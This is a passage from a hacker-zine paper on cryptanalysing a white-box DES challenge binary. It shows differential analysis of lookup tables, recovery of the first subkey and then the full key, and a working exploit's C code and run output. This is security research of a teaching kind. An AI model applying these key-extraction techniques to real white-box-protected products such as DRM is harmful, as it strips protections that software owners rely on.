                |                                                 |
          .-----|----------------------------.                    v
          |.----v-. .------.         .------.|              .----------.
          || OUT0 | | OUT1 |   ...   | OUT7 ||              |  OUTPUT  |
          |'------' '------'         '------'|              '----------'
          '----------------------------------'

           2x4bits
           <------>
                      8 x (2x4) = 64 bits
          <---------------------------------->


    Writing the C code corresponding to these functions is not difficult
though a bit boring (not to mention prone to mistakes). I was able to
rewrite the whole binary in a few hours (and it took me almost the same
time to make it work :O). The source code is available in the appendix.

Remark: I've not tried to use Hex-Rays on the binary but it could be
interesting to know if the decompilation is working out of the box.

    It's easy to see that my source code is functionally equivalent on the
input/output behavior:

---------------------------------------------------------------------------
$ ./wbDES.orig 11 22 ff dd 00 11 26 93           <- the original

INPUT:    11 22 ff dd 00 11 26 93
OUTPUT:   04 e9 ff 8e 2e 98 6c 6b
$ make
$ ./wbdes.try 11 22 ff dd 00 11 26 93            <- my copy :)

INPUT:    11 22 ff dd 00 11 26 93
OUTPUT:   04 e9 ff 8e 2e 98 6c 6b
$
---------------------------------------------------------------------------

    Now let's try to break the white-box. We will proceed in two steps
which is exactly how I handled the challenge. What is described is how I
proceeded as I wasn't following academic publications. I don't know if it's
a better approach or not. It's just my way of doing things and because I'm
not a cryptographer, it's _practical_. If you prefer more _theoretical_
solutions, please refer to [R04] for a list of papers dealing with the
subject.


----[ 6.2 - The discovery step


    First of all, let's gather some information about this white-box. There
is a first immediate observation: there is no explicit T-box step which
proves that it is combined with the AT step in a same function. This is an
optimization which was historically proposed in [R14] in order to protect
the output of the T-box and, as a result, to mitigate the so-called
statistical bucketing attack described in [R09] while compressing the
implementation by merging operations.

    I used this information as well as the size of the binary (which is a
bit more than the size of the lookup tables) as indicators of how recent
the design could be. I didn't have the time to read all the white-box
related papers (although there are not a thousand of them).


                          Analyzing the wb_init()
                          -----------------------


    Earlier, I've made assumptions about wb_init() and wb_round() but at
this point little is really known about them. Now is the time to play a bit
with wb_init() and by playing I mean discovering the "link" between the
input (plaintext) and the input of wb_round() which will be called "stage0"
from now on.

    Let's begin by a quick observation. As said before, for each output
byte of wb_init(), there is a corresponding set of 14 (condensed) iBox_i.
A simple glance at these boxes is enough to determine that for each set,
the 8 first iBox_i have a very low entropy. Conversely, the remaining 5
ones have a high entropy:

---------------------------------------------------------------------------
[...]

unsigned char iBOX_3[12][256] = {
{
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,0xf7,
 [...]
 0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
 0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,0xf1,
},

[...]

unsigned char iBOX_8[12][256] = {
{
 0x13,0xdf,0xf9,0x38,0x61,0xe2,0x44,0x9e,0xc0,0x2a,0x0b,0xb7,0x7c,0xad,
 0x56,0x85,0x96,0xbe,0x8b,0x04,0x27,0xcd,0xa8,0x1f,0xec,0x65,0x39,0xd1,
 0x50,0x42,0x73,0xfa,0x4a,0x52,0x04,0x8b,0xcc,0x2f,0x19,0xad,0x67,0xe3,
 [...]
 0x8a,0x08,0xbd,0x59,0x36,0xf1,0xef,0x45,0x13,0xd4,0x90,0x67,0xae,0x76,
 0x3c,0xf7,0xe4,0x65,0x91,0x43,0x2b,0xcd,0x80,0x58,0xd9,0x1a,0xbf,0x02,
},

[...]
---------------------------------------------------------------------------

    The example shows us that iBOX_3[0] has only 2 possibles values: 0xf7
for any index inferior or equal to 127 and 0xf1 for the remaining ones.
Said otherwise, this box is a bit filter:

        - High output nibble: only 1 possible value (0xf) => no bit chosen
        - Low output nibble: 2 possible values (0x1, 0x7) => the input's
                             MSB is chosen

    Let's visualize the effect of the 8 first iBox_i for every output
nibble. To see if the particular bit at position 'i' is involved in the LUT
'p' then you can compute:

        - p[0]&0xf0 and p[(1<<i)]&0xf0    ; influence on the High nibble
        - p[0]&0x0f and p[(1<<i)]&0x0f    ; influence on the Low nibble

    In each case, if the bit at the position 'i' is indeed involved then
both results will be different. I implemented it in entropy.c
(see appendix):

---------------------------------------------------------------------------
$ ./entropy

[+] Link between IN and OUT arrays
  OUT[0] (high) is composed of:
    -> bit 6
    -> bit 49
    -> bit 57
    -> bit 56
  OUT[0] (low) is composed of:
    -> bit 24
    -> bit 32
    -> bit 40
    -> bit 48
[...]
  OUT[11] (high) is composed of:
    -> bit 7
    -> bit 15
    -> bit 23
    -> bit 31
  OUT[11] (low) is composed of:
    -> bit 14
    -> bit 22
    -> bit 46
    -> bit 54
[+] Total nbr of bits involved = 96
[...]
---------------------------------------------------------------------------

    So the analysis of the 8 first LUT reveals that each output (OUT[i])
nibble is linked to exactly 4 input bits. So the 8 first iBox_i are no more
than an obfuscated linear mapping.

    A good idea is to focus more specifically on the input bits frequency:

---------------------------------------------------------------------------
$ ./entropy
[...]
[+] Nbr of times a bit is used
  [b_00] 2 [b_01] 1 [b_02] 2 [b_03] 1 [b_04] 2 [b_05] 1 [b_06] 2 [b_07] 1
  [b_08] 2 [b_09] 1 [b_10] 2 [b_11] 1 [b_12] 2 [b_13] 1 [b_14] 2 [b_15] 1
  [b_16] 2 [b_17] 1 [b_18] 2 [b_19] 1 [b_20] 2 [b_21] 1 [b_22] 2 [b_23] 1
  [b_24] 2 [b_25] 1 [b_26] 2 [b_27] 1 [b_28] 2 [b_29] 1 [b_30] 2 [b_31] 1
  [b_32] 2 [b_33] 1 [b_34] 2 [b_35] 1 [b_36] 2 [b_37] 1 [b_38] 2 [b_39] 1
  [b_40] 2 [b_41] 1 [b_42] 2 [b_43] 1 [b_44] 2 [b_45] 1 [b_46] 2 [b_47] 1
  [b_48] 2 [b_49] 1 [b_50] 2 [b_51] 1 [b_52] 2 [b_53] 1 [b_54] 2 [b_55] 1
  [b_56] 2 [b_57] 1 [b_58] 2 [b_59] 1 [b_60] 2 [b_61] 1 [b_62] 2 [b_63] 1
$
---------------------------------------------------------------------------

    The even bits are used exactly twice while odd ones are only used once
(here odd and even both refer to the position). Or you could say that even
bits are duplicated in the internal state built after this step.

    Anybody familiar with the DES knows that the IP(X) function of the DES
gives the internal state L || R where:

    - L is an array composed of the odd bits of X
    - R is an array composed of the even bits of X

    In an academic WB DES implementation, building the 96 bits state is
performed using the duplication of even bits (R). This is because these
bits are necessary as both input of the E-box and output of the DES round
function (see my previous description of DES). So we have an obvious match
and it's a clear indication that there is no external encoding applied to
the input (and as a consequence probably none applied to the output as
well). More precisely there could still be a bit permutation on both L & R
bits but it sounds like a silly hypothesis so let's forget about that.
What would be the point?

                                    ---

   Now let's continue with the differential analysis of the full wb_init().
This step is much more intuitive. Think about it: if you want to discover
the nibbles of stage0 (the output of wb_init) influenced by a specific
input bit then apply wb_init() to two inputs whose only difference is this
bit. Then calculate the XOR of both results and the non null nibbles are
the ones which are affected. This was greatly inspired by [R09].

---------------------------------------------------------------------------
$ ./entropy
[...]
[+] Differential cryptanalysis on wb_init()
    -> b_00 :: 00 04 20 00 00 00 00 00 00 00 00 00
    -> b_01 :: 00 00 00 40 00 00 00 00 00 00 00 00
    -> b_02 :: 00 00 00 09 d0 00 00 00 00 00 00 00
    -> b_03 :: 00 00 00 00 00 00 00 90 00 00 00 00
    -> b_04 :: 00 00 00 00 00 0e 60 00 00 00 00 00
    -> b_05 :: 00 00 00 00 00 00 00 00 00 50 00 00
    -> b_06 :: 80 00 00 00 00 00 00 05 00 00 00 00
    -> b_07 :: 00 00 00 00 00 00 00 00 00 00 00 b0
    -> b_08 :: 00 07 00 00 00 00 00 00 01 00 00 00
    -> b_09 :: 00 00 00 f0 00 00 00 00 00 00 00 00
    -> b_10 :: 00 00 00 06 00 00 00 00 00 03 00 00
[...]
---------------------------------------------------------------------------

    So for even bits there are 2 nibbles affected and only one for odd
bits. Not only does it confirm our previous hypothesis but it also reveals
the position (the index in the nibble array) of the bits in the WB internal
state (up to 1/2 probability for even bits). This is particularly
interesting when it comes to locate S-box for example ;-)


                       Analyzing the first wb_round()
                       ------------------------------


    To analyze this function, one clever trick is to make use of the odd
bits (L0) and perform a differential analysis.

    Natively, the DES satisfies the following system of equations:

        L1 = R0
        R1 = L0 [+] f(R0,K0)

        With
            L0 || R0 being the result of IP(plaintext)
            K0 being the first subkey

    Let's now consider two plaintexts (A and B). The first one is composed
of bits all set to 0 (L0_A || R0_A) whereas the second one ((L0_B || R0_B)
has a weight of 1 and more specifically, its sole bit set to 1 is in L0.

    Remark: While there is only one A, there are obviously 32 possible B.
    We can thus write thanks to the previous equations:

        L1_A = R0_A = 0
        R1_A = L0_A [+] f(R0_A,K0) = f(0,K0)

    And

        L1_B = R0_B = 0
        R1_B = L0_B [+] f(R0_B,K0) = L0_B [+] f(0,K0)

                (Again please excuse the lazy notation)

    This finally gives us:

        DELTA(L1||R1)(A,B) =  ( L1_A [+] L1_B || R1_A [+] R1_B )
                           =  ( 0 [+] 0 || f(0,K0) [+] L0_B [+] f(0,K0) )
                           =  ( 0 || L0_B )

    We know that L0_B's weight is 1 so in a native DES the modification of
one bit in L0 induces the modification of a unique bit in the output of the
DES round function. In an obfuscated context, this means that only one
output nibble is modified and calculating DELTA (the result of the so
called differential analysis if you prefer) is merely a trick to identify
it easily.

    Now that you've grasped the main idea, let's work on the real WB. Again
consider plaintexts A and B which give (L0_A || R0_A) and (L0_B || R0_B)
after IP().

    Because wb_round() includes the E-box and produces a 96 bits output
state, we now have to consider an additional transformation:

    X (64b) ---> [ wb_init + first wb_round ] ----> Y (96b)

    Here Y is the output of wb_round. Following the design in academic
publications we can write:

    Y = RP ( L1 || X1 || r1 )     (RP = Random bit Permutation used to hide
                                        the position of bits in the
                                        obfuscated output.)

    With:
        - L1 being R0 (from DES round equation)
        - X1 being the result of the E-box applied to R1
        - r1 being the complementary bits such as the set of X1 and r1 is
          exactly twice R1

    Now let's apply again the differential analysis. It's important to
remark that RP() and E() are both linear operations as this simplifies
things. Indeed it's well known that:

        LinearFunc(x [+] y) = LinearFunc(x) [+] LinearFunc(y)

    Putting everything together this gives us:

        DELTA(Y)(a,b) = RP(Y_A) [+] RP(Y_B)
                      = RP(Y_A [+] Y_B)
                      = RP(L1_A [+] L1_B || X1_A [+] X1_B
                                         || r1_A [+] r1_B)
                      = RP(0 [+] 0 || E(f(0,K0)) [+] E(L0_B [+] f(0,K0))
                                   || r1_a [+] r1_b)
                      = RP(0 || E(f(0,K0) [+] L0_B [+] f(0,K0)z)
                             || r1_A [+] r1_B)
                      = RP(0 || E(L0_B) || r1_A [+] r1_B)

    If the bit set in L0 is a middle bit then:
        - Weight(E(L0_B)) = 1 and Weight(r1_A [+] r1_B)) = 1
    If the bit set in L0 isn't a middle bit then:
        - Weight(E(L0_B)) = 2 and Weight(r1_A [+] r1_B)) = 0

    In both cases, Weight(RP(0 || E(L0_B) || r1_A [+] r1_B)) = 2, RP having
no effect on the weight since it only permutes bits. This means that 1 bit
modification should have a visible impact on 'at most' 2 nibbles. 'at most'
and not 'exactly' because with the effect of RP() the two bits could be
located in the same nibble.

    Let's see if we are right:

---------------------------------------------------------------------------
   b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00  <-- 2 modified nibbles
   b_03 :: 00 00 00 03 60 00 00 00 00 00 00 00  <-- 2 modified nibbles
   b_05 :: 00 00 00 00 00 04 e0 00 00 00 00 00  <-- 2 modified nibbles
   b_07 :: 90 00 00 00 00 00 00 08 00 00 00 00  ...
   b_09 :: 00 0b 00 00 00 00 00 00 05 00 00 00
   b_11 :: 00 00 00 0f 00 00 00 00 00 08 00 00
   b_13 :: 00 00 00 00 00 0d 00 00 00 00 0f 00
   b_15 :: 00 00 00 00 00 00 00 0f 00 00 00 06
   b_17 :: 00 04 00 00 00 00 00 00 0c 00 00 00
   b_19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
   b_21 :: 00 00 00 00 00 08 00 00 00 00 06 00
   b_23 :: 00 00 00 00 00 00 00 0d 00 00 00 08
   b_25 :: 08 d0 00 00 00 00 00 00 00 00 00 00
   b_27 :: 00 00 04 20 00 00 00 00 00 00 00 00
   b_29 :: 00 00 00 00 05 80 00 00 00 00 00 00
   b_31 :: 00 00 00 00 00 00 04 20 00 00 00 00
   b_33 :: 02 70 00 00 00 00 00 00 00 00 00 00
   b_35 :: 00 00 0c f0 00 00 00 00 00 00 00 00
   b_37 :: 00 00 00 00 0d b0 00 00 00 00 00 00
   b_39 :: 00 00 00 00 00 00 0f a0 00 00 00 00
   b_41 :: 0c 00 00 00 00 00 00 00 0f 00 00 00
   b_43 :: 00 00 0d 00 00 00 00 00 00 02 00 00
   b_45 :: 00 00 00 00 09 00 00 00 00 00 05 00
   b_47 :: 00 00 00 00 00 00 03 00 00 00 00 03
   b_49 :: 0f 00 00 00 00 00 00 00 0d 00 00 00
   b_51 :: 00 00 06 00 00 00 00 00 00 03 00 00
   b_53 :: 00 00 00 00 0b 00 00 00 00 00 0c 00
   b_55 :: 00 00 00 00 00 00 02 00 00 00 00 01
   b_57 :: b0 00 00 00 00 00 00 0c 00 00 00 00
   b_59 :: 00 03 60 00 00 00 00 00 00 00 00 00
   b_61 :: 00 00 00 0e 40 00 00 00 00 00 00 00
   b_63 :: 00 00 00 00 00 0b f0 00 00 00 00 00
---------------------------------------------------------------------------

    And that's exactly what we were expecting :) Well to be honest, I first
observed the result of the differential analysis, then remarked a 'strange'
behavior related to the odd bits and finally figured out why using maths ;)

   One cool thing with this situation is that we can easily leak the
position of the specific S-Boxes inside the T-Boxes. First let's compare
the differential analysis of even bits 28,36,52,60 and of odd bit 1:

---------------------------------------------------------------------------
   b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00
   b_28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
   b_36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
   b_52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
   b_60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
---------------------------------------------------------------------------

    Obviously setting these even bits one by one induces the same
modification (amongst others) as setting the odd bit 1 (nibbles 01L (0x5)
and 02H (0xd)) so there must be some kind of mathematical link between them
because the other bits do not have such property.


                             Playing with Sbox
                             ------------------


    The reason behind this behavior is very simple to explain. But first,
let's take back the example of plaintext 'A' (null vector):

    We know that:

    R1_A = L0_a [+] P(S1[0 [+] k0] || S2[0 [+] k1] || ... || S8[0 [+] k7])
    R1_A = 0    [+] P(S1[k0]       || S2[k0]       || ... || S8[k7])
    R1_A = P( S1[k0] || S2[k1] || ... || S8[k7] )

    Where:
        The ki being 6 bits vectors (0 <= i < 8)
        K0 = k0 || k1 || k2 ... || k7

    Thus in the case of plaintext 0 (A), R1_A is the permutation of the
Sbox output whose inputs are the bits of the first subkey.

    Now let us focus on 1 of the 4 bits generated by an Sbox S (which could
be any of the 8). We do not know its value (b) but when the P-box is
applied it will be located in a particular nibble as illustrated below:


    R1_A = f(R0,K0) = ???? ?b?? ???? ???? ???? ???? ???? ????

                            ^
                            |__  The bit

                      <------------------------------------->
                            (4bits x 8) = 32 bits state


    Because a WB DES implementation is working with a duplicated Rx this
will give us the following internal state:

               ... ??b? ???? ???? ???b ...

                     ^               ^
                     |               |
                     --------------------  b is duplicated

               <------------------------->
                         96 bits state


    Now following what was explained previously with odd bits, out of the
32 possible B, one of them will affect b when L0_B is XORed with f(0,K0)

    So considering a 96 bits internal state inside the WB, this gives us:

               ... ??a? ???? ???? ???a ...

               With:
                   a = b [+] 1

    As a result, the differential between A and B would be:

               ... ??b? ???? ???? ???b ...   (from A)

                          [+]

               ... ??a? ???? ???? ???a ...   (from B)

                           =

               ... ??1? ???? ???? ???1 ...  ( because a [+] b
                                                    = a [+] a [+] 1
                                                    = 1             )

    From now on, we will call this differential our 'witness' and by
extension, the two nibbles where b=1 the 2 witness nibbles.


                         Playing with the witness
                         ------------------------


    Now imagine that we're using another plaintext (X) with weight 1 and
whose weight is in one of the 6 possible bits influencing Sbox S. There are
two possible situations:

        - S still produces b
        - S now produces b+1

    If we perform a differential analysis between X and A (null vector)
this gives us:

    case 1:
    =======

               ... ??b? ???? ???? ???b ...   (from A)

                          [+]

               ... ??b? ???? ???? ???b ...   (from X)

                           =

               ... ??0? ???? ???? ???0 ...   <-- useless output

    case 2:
    =======

               ... ??b? ???? ???? ???b ...   (from A)

                          [+]

               ... ??a? ???? ???? ???a ...   (from X)

                           =

               ... ??1? ???? ???? ???1 ...   <-- witness vector :)))


    So case 2 is perfect because it gives us a distinguisher. We can test
all 32 possible X (each of them having a different even bit set) and
observe the ones which produce the witness vector associated with b.

    This is exactly what we did implicitly when we discovered the link
between bits 28, 36, 52 and 60. Or if you're lost let's say that we've just
discovered something huge: the bits 28, 36, 52 and 60 are the input of the
same Sbox and bit 1 is one of the output of this Sbox. At this point the
protection took a heavy hit.

    Remark: The first subkey is modifying the input sent to the Sbox. As a
consequence the relation previously found is "key dependent". This will be
of importance later, keep reading!


                               Going further
                               -------------


    Let's think. At this point and thanks to our analysis of wb_init()
we're almost sure that there is no external encoding applied to the input.
So there should be a match between our practical results and the
theoretical relations in the original DES algorithm. To verify my theory, I
wrote a little script to compute the positions of the bits involved with
each Sbox:

---------------------------------------------------------------------------
$ ./bitmapping.py
 [6, 56, 48, 40, 32, 24]    <-- Sbox 1
 [32, 24, 16, 8, 0, 58]     <-- Sbox 2
 [0, 58, 50, 42, 34, 26]
 [34, 26, 18, 10, 2, 60]
 [2, 60, 52, 44, 36, 28]    <-- Sbox 5
 [36, 28, 20, 12, 4, 62]
 [4, 62, 54, 46, 38, 30]
 [38, 30, 22, 14, 6, 56]    <-- Sbox 8
---------------------------------------------------------------------------

    Oh interesting so Sbox 5 seems to match with our practical result.
Going deeper, we need to check if bit 01 is involved with this Sbox. Again
I wrote another script to compute the position of odd bits involved with
the Sbox in the original DES and this gives us:

---------------------------------------------------------------------------
$ ./sbox.py | grep 'SBOX 5'
    bit 41 XORED with bit 00 of SBOX 5 (19)
    bit 01 XORED with bit 03 of SBOX 5 (16)
    bit 19 XORED with bit 02 of SBOX 5 (17)
    bit 63 XORED with bit 01 of SBOX 5 (18)
---------------------------------------------------------------------------

    So bit 01 is indeed involved. However let's try to be careful. In
cryptanalysis it's easy to be fooled, so let's make extra checks. For
example can we link a subset of even bits {2, 28, 36, 44, 52, 60} with bit
19 of the same Sbox?

---------------------------------------------------------------------------
        19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
         2 :: 0c 00 06 00 00 0b f2 60 0f 03 00 01
        28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
        36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
        44 :: 00 00 00 09 00 0b f0 00 20 0f 00 00
        52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
        60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
---------------------------------------------------------------------------

    Bit 19 is linked to bit 44 and 52 => YES. At this point, we should
check automatically that the bit relations are satisfied for all the Sbox
but it's tedious. That's the problem :-P Because I was lazy, I manually
checked all the relations. Fortunately with the help of scripts, this only
took me a couple of minutes and it was a 100% match. Again, this proves
nothing but as I said earlier, we're working with guesses.


         Towards a perfect understanding of differential analysis
         --------------------------------------------------------


    Didn't you notice something particular with bit 02, 28 and 60? Well the
'impacted' nibbles were neither 0 nor a witness nibble. For example
consider bit 60:

---------------------------------------------------------------------------
        19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
        60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
---------------------------------------------------------------------------

    The first impacted nibble '0x9' is a good one (witness nibble) but the
second one is neither '0x0' nor '0xf' (witness). How is that possible?

    Well the answer lies in both:
        - the (non)-middle bits
        - the P-box

    Indeed if you consider the bits sent to Sbox 5, you have to know that:
        - bits 02 and 60 are sent to both Sbox 4 & 5
        - bits 52 and 44 are sent to Sbox 5
        - bits 36 and 28 are sent to both Sbox 5 & 6

    So when 1 non-middle bit is set, this will impact the output of 2 Sbox
and we're unlucky, the P-box will have the unfortunate effect of setting
them in the same nibble, hence the difference observed.


----[ 6.3 - Recovering the first subkey


    If the relations observed are 'key dependent', considering the fact
that the S-Boxes are known (which means unmodified otherwise this would be
cheating :p) then isn't this an indirect leak on the key itself that could
be transformed in a key recovery? Oh yes it is :-)


                            First cryptanalysis
                            -------------------


    The main idea is really simple: we know that for a given subkey,
several unitary vectors (plaintexts of weight 1) will produce the same
output bit.

    Let's take again the previous case. We have:


                  .------.------.------.-----.-----.------.
                  | b_02 | b_60 | b_52 |b_44 |b_36 | b_28 |
                  '------'------'------'-----'-----'------'
                                    .....
                                    . + .
                                    .....
                  .------.------.------.-----.-----.------.
                  | k24  | k25  | k26  | k27 | k28 | k29  |
                  '------'------'------'-----'-----'------'
                                      |
                                      v
                            *********************
                            *       Sbox 5      *
                            *********************
                                      |
                                      v
                        .------.------.------.-----.
                        |  y0  |  y1  |  y2  | y3  |
                        '------'------'------'-----'


   Let us consider bit 01. We know that it will be XORed to y2 so from the
differential analysis we can derive the set of relations:

[ k24 [+] 0, k25 [+] 1, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
[ k24 [+] 0, k25 [+] 0, k26 [+] 1, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 1, k29 [+] 0 ] => b
[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 1 ] => b

   So amongst all possible sets {k24,k25,k26,k27,k28,k29}, only a few of
them (including the one from the real subkey) will satisfy the relations.
Testing all possible sets (there are 2^6 = 64 of them) will give us 2 lists
because we do not know if b=1 or b=0 so we have to consider both cases.

   Applying this technique to both y0, y1, y2 and y3 will allow to filter
efficiently the number of possible candidates as we will only consider
those present in all lists. The success of this cryptanalysis is highly
dependent on the number of relations that we will be able to create for a
particular S-Box. Practically speaking, this is sufficient to recover the
first subkey as the complexity should be far below 2^48. Should be? Yes I
didn't test it... I found even better.


                         Immediate subkey recovery
                         -------------------------


    As I said above, our success is dependent of the number of equations so
improving the cryptanalysis can be done by finding ways to increase this
number. There are two obvious ways to do that:

        - There may exist combinations of input bits other than unitary
          vectors (weight > 1) which can produce the witness nibbles in a
          differential analysis.
        - If the impacted nibbles are both 0x0 then this gives us a new
          relation where expected output bit is b [+] 1

   Practically speaking this gives us the following result for Sbox5 and
bit 01:

---------------------------------------------------------------------------
$ ./exploit
[...]
        { 1 0 0 0 0 0 } = { 1 }   <-- dumping relations for S5 & bit 01
        { 0 1 0 0 0 0 } = { 0 }
        { 1 1 0 0 0 0 } = { 0 }
        { 0 0 1 0 0 0 } = { 0 }
        { 1 0 1 0 0 0 } = { 1 }
        { 0 1 1 0 0 0 } = { 1 }
        { 1 1 1 0 0 0 } = { 1 }
        { 0 0 0 1 0 0 } = { 1 }
        { 1 0 0 1 0 0 } = { 0 }
        { 0 1 0 1 0 0 } = { 0 }
        { 1 1 0 1 0 0 } = { 1 }
        { 0 0 1 1 0 0 } = { 1 }
        { 1 0 1 1 0 0 } = { 0 }
        { 0 1 1 1 0 0 } = { 1 }
        { 1 1 1 1 0 0 } = { 0 }
        { 0 0 0 0 1 0 } = { 0 }
        { 1 0 0 0 1 0 } = { 1 }
        { 0 1 0 0 1 0 } = { 0 }
        { 1 1 0 0 1 0 } = { 0 }
        { 0 0 1 0 1 0 } = { 1 }
        { 1 0 1 0 1 0 } = { 0 }
        { 0 1 1 0 1 0 } = { 0 }
        { 1 1 1 0 1 0 } = { 1 }
        { 0 0 0 1 1 0 } = { 0 }
        { 1 0 0 1 1 0 } = { 0 }
        { 0 1 0 1 1 0 } = { 1 }
        { 1 1 0 1 1 0 } = { 0 }
        { 0 1 0 1 0 1 } = { 1 }

[...]

        [ key candidate is 31]
---------------------------------------------------------------------------

    The cryptanalysts have the habit to always evaluate the complexity of
their attacks but in this case let's say that it's useless. Only one subkey
appeared to be valid out of the 2^48 possible ones.


----[ 6.4 - Recovering the original key


    Now that we've retrieved the first subkey, our goal is almost reached.
So how do we retrieve the secret key? Well DES subkeys can be seen as
truncated permutations of the original key. This means that we now have 48
out of the 56 bits of the original key.

    I could explain the key scheduling mechanism of the DES, but it's
useless as the only important thing is to be able to reverse the
permutation. This is done easily thanks to the following python
manipulation applied to the sKMap1 array, itself being shamelessly ripped
from [13]:

---------------------------------------------------------------------------
>>> InvsKMap1 = [ -1 for i in xrange(64) ]
>>> for x in xrange(len(InvsKMap1)):
...     if 7-x%8 == 0:
...             InvsKMap1[x] = -2
...
>>> for x in xrange(64):
...     if x in sKMap1:
...             InvsKMap1[x] = sKMap1.index(x)
...
>>> InvsKMap1
[19, 8, 12, 29, 32, -1, -1, -2, 9, 0, -1, -1, 44, 43, 40, -2, 5, 22, 10,
41, 37, 24, 34, -2, 15, 14, 21, 25, 35, 31, 47, -2, 6, 2, 13, 20, 28, 38,
26, -2, 23, 11, -1, 16, 42, -1, 30, -2, 4, -1, 1, -1, 33, 27, 46, -2, 7,
17, 18, 3, 36, 45, 39, -2]
>>>
---------------------------------------------------------------------------

    Here is the resulting array:

        char InvsKMap1[64] = {
            19,  8, 12, 29, 32, -1, -1, -2,
             9,  0, -1, -1, 44, 43, 40, -2,
             5, 22, 10, 41, 37, 24, 34, -2,
            15, 14, 21, 25, 35, 31, 47, -2,
             6,  2, 13, 20, 28, 38, 26, -2,
            23, 11, -1, 16, 42, -1, 30, -2,
             4, -1,  1, -1, 33, 27, 46, -2,
             7, 17, 18,  3, 36, 45, 39, -2
            };

    My exploit uses this array to build an original key out of both the
subkey bits and an 8 bits vector. '-1' is set for a bit position where the
value has to be guessed. There are 8 such positions, and for each of them,
a bit is taken from the 8 bits vector. '-2' means that the bit can be
anything.  Indeed the most significant bits (the so-called parity bits) of
the 8 bytes key array are never taken into account (hence the well known
8 x 7 = 56 bits keylength).

    Now the only remaining thing to do is to guess these 8 missing bits.
Obviously for each guess you will generate an original key 'K' and test it
against a known couple of input/output generated by the white-box. The
whole operation was implemented below:

---------------------------------------------------------------------------
void RebuildKeyFromSk1(uchar *dst, uchar *src, uchar lastbits)
{
        int i,j;
        char *plastbits = (char *)&lastbits;

        memset(dst, 0, DES_KEY_LENGTH);
        for(i=0,j=0; i<64; i++)
        {
                // Parity bit
                if(InvsKMap1[i] == -2)
                        continue;

                // Bit is guessed
                else if(InvsKMap1[i] == -1)
                {
                        if(GETBIT(plastbits,j))
                                SETBIT(dst,i);
                        j++;
                }
                // Bit is already known
                else
                {
                        if(GETBIT(src, InvsKMap1[i]))
                                SETBIT(dst,i);
                }
        }
        return;
}

[...]

        const_DES_cblock in = "\x12\x32\xe7\xd3\x0f\xf1\x29\xb3";
        const_DES_cblock expected = "\xa1\x6b\xd2\xeb\xbf\xe1\xd1\xc2";
        DES_cblock key;
        DES_cblock out;
        DES_key_schedule ks;

        for(missing_bits=0; missing_bits<256; missing_bits++)
        {
            RebuildKeyFromSk1(key, sk, missing_bits);
            memset(out, 0, sizeof out);
            DES_set_key(&key, &ks);
            DES_ecb_encrypt(&in, &out, &ks, DES_ENCRYPT);

            if(!memcmp(out,expected,DES_BLOCK_LENGTH))
            {
                printf("[+] Key was found!\n");
                [...]
            }
        }
---------------------------------------------------------------------------

    The whole cryptanalysis of the white-box is very effective and allows
us to retrieve a key in a few ms. More precisely it retrieves _1_ of the
256 possible 8 bytes key ;)

---------------------------------------------------------------------------
$ tar xfz p68-exploit.tgz; cd p68-exploit
$ wget http://homes.esat.kuleuven.be/~bwyseur/research/wbDES
$ md5sum wbDES
b9c4c69b08e12f577c91ec186edc5355  wbDES   # you can never be sure ;-)
$ for f in scripts/*.gdb; do gdb -x $f; done > /dev/null  # is quite long
$ make
gcc -c wb_init.c -O3 -Wall
gcc -c wb_round.c -O3 -Wall
gcc -c wb_final.c -O3 -Wall
gcc exploit.c *.o -O3 -Wall -o exploit -lm -lcrypto
gcc wb_main.c *.o -O3 -Wall -o wbdes.try
gcc entropy.c -o entropy -lm
$ ./exploit

[+] Number of possible candidates = 256
	-> Required computation is 2^(8) * DES()

[+] Key was found!
	-> Missing bits: 0x3d
	-> Key: '02424626'

$
---------------------------------------------------------------------------

    And that's it! So the key was bf-able after all ;>


--[ 7 - Conclusion


    Nowadays there are a lot of white-box protections in the wild (DRM but
not only) using either academic designs or their improvements. Each of them
is an interesting challenge which is why you may want to face it one day.
This paper is not ground breaking nor even relevant for the average
cryptographer, the cryptanalysis of the naked DES being covered in many
papers including [R16]. I wrote it however with the hope that it would give
you an overview of what practical white-box cracking could be. I hope you
enjoyed it :)

    Feel free to contact me for any question related to this paper using
the mail alias provided in the title of the paper.


--[ 8 - Gr33tz


    Many (randomly ordered) thanks to:

    - the #f4lst4ff crypt0/b33r team for introducing me to the concept of
      white-box a few years ago.
    - Jb & Brecht for their implementations which gave me a lot of fun :)
    - X, Y, Z who will remain anonymous but nonetheless helped me to
      improve _significantly_ the paper. If you managed to understand a few
      things out of this "blabla" then you must thank them (and especially
      X). I owe you big time man :)
    - asciio authors because without this tool I would never have found the
